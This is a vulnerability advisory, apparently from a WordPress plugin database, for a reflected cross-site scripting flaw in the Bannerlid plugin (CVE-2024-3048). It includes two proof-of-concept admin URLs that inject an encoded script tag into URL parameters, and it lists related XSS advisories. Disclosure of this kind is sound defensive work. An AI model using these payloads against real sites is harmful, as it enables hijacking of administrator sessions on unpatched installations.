Bannerlid <= 1.1.0 – Reflected XSS | CVE 2024-3048 | Plugin Vulnerabilities

Description

The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators

Proof of Concept

Have an admin open URLs:

- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=Overview&id=1&timelength=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

e179ff7d-137c-48bf-8b18-e874e3f876f4

Timeline

Publicly Published

2024-04-05 (about 1 months ago)

Added

2024-04-05 (about 1 months ago)

Last Updated

2024-04-05 (about 1 months ago)

Other

Published

Title

Published

2017-12-10

Title

RegistrationMagic - Custom Registration Forms < 3.8.0.9 - Authenticated Reflected XSS

Published

2022-05-24

Title

Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting

Published

2024-04-05

Title

Bold Page Builder < 4.8.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via bt_bb_price_list Shortcode

Published

2023-03-14

Title

Easy Event calendar <= 1.0 - Admin+ Stored XSS

Published

2015-08-26

Title

Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)